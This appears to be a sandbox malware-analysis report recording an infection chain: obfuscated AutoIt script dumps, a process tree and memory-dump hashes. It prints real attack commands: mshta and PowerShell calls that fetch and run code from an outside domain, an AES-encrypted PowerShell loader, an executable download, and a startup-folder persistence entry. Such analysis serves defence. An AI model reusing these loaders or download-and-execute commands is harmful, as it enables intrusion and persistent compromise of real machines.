2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 2c 20 57 61 6c 65 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 29 0a 41 43 6f 73 28 39 34 36 37 29 0a 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 24 77 61 69 74 73 75 73 73 65 78 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 57 69 64 65 73 63 72 65 65 6e 54 72 61 69 6e 41 6e 61 74 6f 6d 79 20 3d 20 34 39 0a 24 72 65 6c 61 74 Data Ascii: s("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3), Wales("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3))ACos(9467)$waitsussex = $waitsussex + 1EndIfNext$WidescreenTrainAnatomy = 49$relat
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 6e 74 75 72 6e 20 3d 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 73 61 66 65 6c 79 77 72 69 67 68 74 68 6f 6d 65 74 6f 77 6e 61 6c 75 6d 69 6e 75 6d 20 3d 20 27 33 36 39 37 38 35 33 37 31 35 37 39 30 37 33 38 30 39 34 30 37 38 36 30 31 32 32 36 32 39 34 34 39 32 30 31 30 31 33 30 37 38 38 39 31 32 36 38 38 37 39 32 31 31 33 35 31 30 36 37 34 37 35 32 31 27 0a 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 39 30 0a 24 41 67 61 69 6e 73 74 47 72 69 70 47 75 79 45 75 72 6f 70 65 20 3d 20 36 36 0a 57 68 69 6c 65 20 39 30 32 0a 49 66 20 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 38 39 Data Ascii: nturn = $settingsomersetvegetarianturn + 1EndIfNext$safelywrighthometownaluminum = '36978537157907380940786012262944920101307889126887921135106747521'$DefinitionsFavouritesUri = 90$AgainstGripGuyEurope = 66While 902If $DefinitionsFavouritesUri = 89
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 37 20 54 68 65 6e 0a 41 54 61 6e 28 36 35 37 31 29 0a 43 68 72 28 38 37 35 38 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 2c 20 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 29 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 Data Ascii: StrictRealtorsAdministration = 7 ThenATan(6571)Chr(8758)PixelGetColor(Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4), Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4))$StrictRealtorsAdministration = $StrictRealtorsA
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 34 20 54 68 65 6e 0a 24 49 4e 48 45 52 49 54 45 44 45 4e 41 52 49 53 49 4e 47 20 3d 20 53 71 72 74 28 35 32 30 32 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 35 20 54 68 65 6e 0a 41 53 69 6e 28 31 39 39 33 29 0a 41 43 6f 73 28 32 38 32 33 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 38 30 5d 38 32 5d 37 33 5d 37 38 5d 36 37 5d 37 33 5d 38 30 5d 37 36 5d 36 39 5d 33 35 5d 37 31 5d 36 35 5d 37 37 5d 36 39 5d 38 33 5d 38 30 5d 37 39 5d 38 34 5d 33 35 22 2c 30 2f 35 29 29 0a 24 4a 65 4f 6b 61 79 20 3d 20 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 52 6f Data Ascii: $JeOkay + 1EndIfIf $JeOkay = 54 Then$INHERITEDENARISING = Sqrt(5202)ExitLoopEndIfIf $JeOkay = 55 ThenASin(1993)ACos(2823)ConsoleWriteError(Wales("80]82]73]78]67]73]80]76]69]35]71]65]77]69]83]80]79]84]35",0/5))$JeOkay = $JeOkay + 1EndIfNext$Ro
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 73 69 6f 6e 20 3d 20 39 30 20 54 68 65 6e 0a 41 54 61 6e 28 33 36 31 31 29 0a 44 65 63 28 57 61 6c 65 73 28 22 37 35 5d 31 32 34 5d 31 30 33 5d 31 31 34 5d 31 32 33 5d 31 30 33 5d 31 32 32 5d 31 30 37 5d 33 38 22 2c 34 38 2f 38 29 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 37 31 5d 39 38 5d 31 30 30 5d 31 31 37 5d 31 31 32 5d 31 31 35 5d 31 32 32 5d 36 32 5d 38 33 5d 31 30 32 5d 31 30 39 5d 36 32 5d 38 34 5d 31 31 38 5d 31 31 36 5d 31 31 33 5d 31 30 32 5d 31 30 30 5d 31 31 37 5d 36 32 5d 37 34 5d 31 30 39 5d 31 30 39 5d 31 31 38 5d 31 31 36 5d 31 31 37 5d 31 31 35 5d 39 38 5d 31 31 37 5d 31 30 32 5d 31 30 31 5d 36 32 22 2c 35 2f 35 29 29 0a 24 54 72 69 70 6c 65 43 6f 6e 63 6c 75 73 69 6f 6e 20 3d 20 24 54 72 69 70 6c 65 43 6f 6e 63 6c Data Ascii: sion = 90 ThenATan(3611)Dec(Wales("75]124]103]114]123]103]122]107]38",48/8))DriveStatus(Wales("71]98]100]117]112]115]122]62]83]102]109]62]84]118]116]113]102]100]117]62]74]109]109]118]116]117]115]98]117]102]101]62",5/5))$TripleConclusion = $TripleConcl
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 24 42 55 54 4b 4e 49 54 54 49 4e 47 43 48 52 4f 4d 45 2c 20 24 63 61 6e 62 65 72 72 61 66 75 6e 64 61 6d 65 6e 74 61 6c 65 76 69 6c 63 65 6f 29 0a 24 43 6f 6e 73 74 72 61 69 6e 74 47 65 6e 64 65 72 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 20 3d 20 27 34 35 31 35 34 39 32 35 36 34 37 32 30 35 37 32 37 37 32 33 33 32 39 34 34 32 36 33 36 37 38 35 35 38 38 37 30 27 0a 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 31 0a 24 54 69 6e 44 65 74 65 72 6d 69 6e 65 50 65 72 73 6f 6e 20 3d 20 37 38 0a 46 6f 72 20 24 6e 45 53 52 72 5a 41 20 3d 20 35 32 20 54 6f 20 39 31 33 0a 49 66 20 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 30 20 54 68 65 6e 0a 45 78 70 28 35 32 33 34 29 0a 41 43 6f 73 28 35 34 39 Data Ascii: $BUTKNITTINGCHROME, $canberrafundamentalevilceo)$ConstraintGenderInterpretation = '4515492564720572772332944263678558870'$WillingWebpageFashion = 31$TinDeterminePerson = 78For $nESRrZA = 52 To 913If $WillingWebpageFashion = 30 ThenExp(5234)ACos(549

Target ID:	1
Start time:	03:35:13
Start date:	28/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')"
Imagebase:	0x7ff6bfac0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:35:13
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:35:14
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:35:14
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:35:16
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/Ghep2712"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:35:16
Start date:	28/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712
Imagebase:	0x7ff69cdd0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:35:20
Start date:	28/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:35:21
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6)
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:35:21
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:35:26
Start date:	28/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
Imagebase:	0x7ff6153b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:35:26
Start date:	28/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff61f300000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	03:35:27
Start date:	28/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1580,i,9458825492255786744,15247656266253398828,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff61f300000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:35:31
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Roaming\qJXhXwR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\qJXhXwR.exe"
Imagebase:	0x7ff7a51a0000
File size:	1'083'904 bytes
MD5 hash:	2B5ED481EEE9DE59066B4859C2BD354A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 35%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:35:32
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe""
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:35:32
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:35:38
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:35:38
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:35:45
Start date:	28/12/2024
Path:	C:\Users\Public\Guard.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Imagebase:	0x8f0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	03:35:47
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:35:47
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:35:58
Start date:	28/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Imagebase:	0x7ff6dbe00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:36:01
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Imagebase:	0x130000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Show Windows behavior

Function 00007FF8879F33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1417510121.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8879f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 093ab3da0933ac8de6e334a14d64250ff59992b376f51f2026c291077b26f4e8
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 9301A73011CB0D4FD744EF0CE455AA5B3E0FB85360F10052DE58AC3691DA36E882CB42

Analysis Process: mshta.exePID: 7728, Parent PID: 7648COMMON

Executed Functions

Function 000001D24DB20FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1722488108.000001D24DB20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D24DB20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_1d24db20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 2862c48f54f6c1ec5fdc53762ed09b7ffcd39b691f4418ea6f8b3ff7c7dc1fc4
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash: 4B9002159D584655D41411950C8939C50406398260FD44481882694544D95D02961252

Function 000001D24DB20FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1722488108.000001D24DB20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D24DB20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_1d24db20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 2862c48f54f6c1ec5fdc53762ed09b7ffcd39b691f4418ea6f8b3ff7c7dc1fc4
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash: 4B9002159D584655D41411950C8939C50406398260FD44481882694544D95D02961252

Function 000001D24DB20FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1722488108.000001D24DB20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D24DB20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_1d24db20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 2862c48f54f6c1ec5fdc53762ed09b7ffcd39b691f4418ea6f8b3ff7c7dc1fc4
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash: 4B9002159D584655D41411950C8939C50406398260FD44481882694544D95D02961252

Analysis Process: powershell.exePID: 7952, Parent PID: 7728COMMON

Executed Functions

Function 00007FF886D745AC Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1716652374.00007FF886D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8241a2d3fc0482351eccc54995cb10cd56a63c6638c49431618173e7d15da601
Instruction ID: 38d19047d1a9cd529ee773586359e07ac03c427dc589dd39c0dbe7bd6a810273
Opcode Fuzzy Hash: 8241a2d3fc0482351eccc54995cb10cd56a63c6638c49431618173e7d15da601
Instruction Fuzzy Hash: ED12F322D1EBC64FE39796B818656B57BE1EF522B0B1901FAC08EC71E3DD095C06C392

Function 00007FF886CA7571 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1715933575.00007FF886CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c6098f2eea8574f012ace36c6b52ec2f7acdee9e2e9a0148292698a5ee1c21d
Instruction ID: 58c6c5cfaf3c4f6b8c966d307dda0b9111e111c676fba32910e8d9dc02874726
Opcode Fuzzy Hash: 0c6098f2eea8574f012ace36c6b52ec2f7acdee9e2e9a0148292698a5ee1c21d
Instruction Fuzzy Hash: 61020570A18A4D8FDB89EF5CC495AB97BE2FF68351F14016AD04DD3296CA34EC42CB91

Function 00007FF886CA5DC0 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1715933575.00007FF886CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff8011bcd52e6d80cc59584cabeddda28d4f52895b4780c44b5e91da0560e15
Instruction ID: cadb735bb7585db875961bcdb8b585dc660b2cf88415c2ef0659e7fbbf4ee696
Opcode Fuzzy Hash: 7ff8011bcd52e6d80cc59584cabeddda28d4f52895b4780c44b5e91da0560e15
Instruction Fuzzy Hash: 90D18F70A18A4D8FDF89DF58C495AA9BBE2FF68341F54416AD40DD3296CA34EC81CBC1

